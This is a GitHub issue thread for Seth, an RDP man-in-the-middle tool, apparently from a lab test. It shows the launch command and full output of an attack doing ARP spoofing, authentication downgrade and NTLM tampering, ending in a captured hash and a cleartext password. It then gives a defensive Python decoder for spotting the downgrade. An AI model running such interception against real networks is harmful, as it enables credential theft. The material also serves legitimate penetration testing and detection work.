SySS-Research / Seth

Perform a MitM attack and extract clear text credentials from RDP connections
MIT License

RC4 not available on client #52

Closed alovinaX closed 3 years ago

alovinaX commented 3 years ago

I use Ubuntu 18.04 and my target is Windows 10 64-bit. When I run the script with the following command, I get these errors:

./seth.sh eth1 192.168.10.{59,57,10} calc

███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║   https://www.syss.de
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[] Linux OS detected, using iptables as the netfilter interpreter
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.10.10
[] Clone the x509 certificate of the original destination...
[] Adjust iptables rules for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from 192.168.10.57:49802
Warning: RC4 not available on client, attack might not work
Listening for new connection
Downgrading authentication options from 11 to 3
Enable SSL
test::DESKTOP-V50VN9K:b6f9cc86441228f9:bea6860fecda0cd86cd5b23b4216b602:
Tamper with NTLM response
Downgrading CredSSP
Connection lost ([Errno 104] Connection reset by peer)
Connection received from 192.168.10.57:49809
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Connection lost on run_fake_server
Connection received from 192.168.10.57:49810
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
.\test:test123
[] Cleaning up...
[] Done

AdrianVollmer commented 3 years ago

Hey there, it's just a warning. You can ignore it, especially if the password appears in the output, which means the attack was successful.
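
For anyone reading the log above from the defending side: the line "Downgrading authentication options from 11 to 3" can be decoded with the sketch below, which is an added example and not code from Seth or from this thread. It assumes the two numbers are the requestedProtocols field of the RDP Negotiation Request (MS-RDPBCGR); the function names and the sample packets are constructed for illustration.

```python
import struct

# requestedProtocols flag bits of RDP_NEG_REQ, as defined in MS-RDPBCGR
FLAGS = {0x1: "PROTOCOL_SSL", 0x2: "PROTOCOL_HYBRID",
         0x4: "PROTOCOL_RDSTLS", 0x8: "PROTOCOL_HYBRID_EX"}


def decode_protocols(value):
    """Names of the security protocols set in a requestedProtocols value."""
    names = [name for bit, name in FLAGS.items() if value & bit]
    return names or ["PROTOCOL_RDP"]  # 0 = Standard RDP Security only


def requested_protocols(pdu):
    """Read requestedProtocols from a TPKT/X.224 Connection Request."""
    if len(pdu) < 11 or pdu[0] != 0x03 or pdu[5] & 0xF0 != 0xE0:
        raise ValueError("not an X.224 Connection Request")
    if struct.unpack(">H", pdu[2:4])[0] != len(pdu):
        raise ValueError("TPKT length does not match packet size")
    body = pdu[11:]  # skip TPKT header (4 bytes) and X.224 CR header (7 bytes)
    if body.startswith(b"Cookie:"):  # optional routing token or cookie line
        end = body.find(b"\r\n")
        if end < 0:
            raise ValueError("unterminated cookie line")
        body = body[end + 2:]
    if not body:
        return 0  # no RDP_NEG_REQ: client offers Standard RDP Security only
    if len(body) < 8 or body[0] != 0x01 or body[2:4] != b"\x08\x00":
        raise ValueError("malformed RDP_NEG_REQ")
    return struct.unpack("<I", body[4:8])[0]


def dropped_protocols(client_sent, server_received):
    """Protocols the client offered that never reached the server."""
    missing = client_sent & ~server_received
    return decode_protocols(missing) if missing else []


def build_request(protocols, cookie=b""):
    """Constructed sample packet for this example (not a capture)."""
    neg = struct.pack("<BBHI", 0x01, 0, 8, protocols)
    payload = bytes([6 + len(cookie) + len(neg), 0xE0, 0, 0, 0, 0, 0]) + cookie + neg
    return b"\x03\x00" + struct.pack(">H", 4 + len(payload)) + payload


if __name__ == "__main__":
    cookie = b"Cookie: mstshash=test\r\n"  # constructed sample value
    sent, seen = (requested_protocols(build_request(v, cookie)) for v in (11, 3))
    print(decode_protocols(sent), "->", decode_protocols(seen),
          "dropped:", dropped_protocols(sent, seen))
```

Comparing the value in a client-side capture with the value in a server-side capture of the same connection shows whether a flag was removed on the path between them.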